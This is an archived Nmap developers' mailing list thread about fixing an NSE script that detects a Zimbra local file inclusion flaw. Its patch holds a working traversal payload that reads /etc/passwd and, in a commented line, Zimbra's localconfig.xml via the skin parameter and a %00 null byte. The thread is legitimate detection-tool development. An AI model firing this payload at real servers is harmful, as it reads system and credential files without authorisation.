Home page logo
/

nmap-dev logo Nmap Development mailing list archives

Re: [NSE] Created NSE script to detect Zimbra 0 day
From: Paul AMAR <aos.paul () gmail com>
Date: Fri, 7 Feb 2014 10:10:11 +0100

Hi,

Got quite busy and I forgot about the task.

Here is the patch  :

Index: http-vuln-zimbra-lfi.nse
===================================================================
--- http-vuln-zimbra-lfi.nse    (revision 32704)
+++ http-vuln-zimbra-lfi.nse    (working copy)
@@ -87,8 +87,8 @@
   local file_long = "../../../../../../../../../etc/passwd"
   --local file_long =
"../../../../../../../../../opt/zimbra/conf/localconfig.xml"

-  local url_short =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_short .. "%00"
-  local url_long =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_long .. "%00"
+  local url_short =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_short .. "%00"
+  local url_long =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_long .. "%00"

   stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
   stdnse.print_debug(1, "GET " .. uri .. escape(url_short))

Cheers and thanks to Chris to remind me.


2014-01-09 10:18 GMT+01:00 Paul AMAR <aos.paul () gmail com>:

Hi there,

Got a remark from Chris Schatz, and actually, there's some '%' symbols
missing in the urls starting line 90.

  local url_short =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_short .. "00"
  local url_long =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_long .. "00"

but It should be :


  local url_short = 
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. 
"%00"
  local url_long = 
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. 
"%00"


If you all agree, i'll submit a patch in the day to patch this.
Thanks Chris !



2013/12/20 Paul AMAR <aos.paul () gmail com>

Hi,

Thanks for updating the script Ron.
That's really weird that it was working for me though.

@George, thanks for the hint with the special character "-".


2013/12/19 Ron <ron () skullsecurity net>

I fixed up the code quite a bit and submitted it on irc, it cleanly
detects vulnerable and patched hosts now.

Ron

On 19 Dec 2013 10:34, George Chatzisofroniou <sophron () latthi com> wrote:

On Wed, Dec 18, 2013 at 06:18:57PM -0600, Ron wrote:
The issue with the script as-is is, once the vuln is patched, it'll
keep
reporting it's vulnerable, I think, unless they just delete the
file. if
you try to grab a "bad" file (like /etc/shadow), everything seem to
work
fine.

There are some fixes around already. By fixing the LFI, the HTTP
response status
won't be 200, so the script will not return a false positive.

It works if I switch out the string.match() with "==".

I don't know why, though!

That's because Lua string.match() method expects a pattern as a second
argument
(not a raw string) and the special "-" character is interpreted as the
Lua
modifier for repetitions. Thanks for cathing this.

--
George Chatzisofroniou
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/




_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]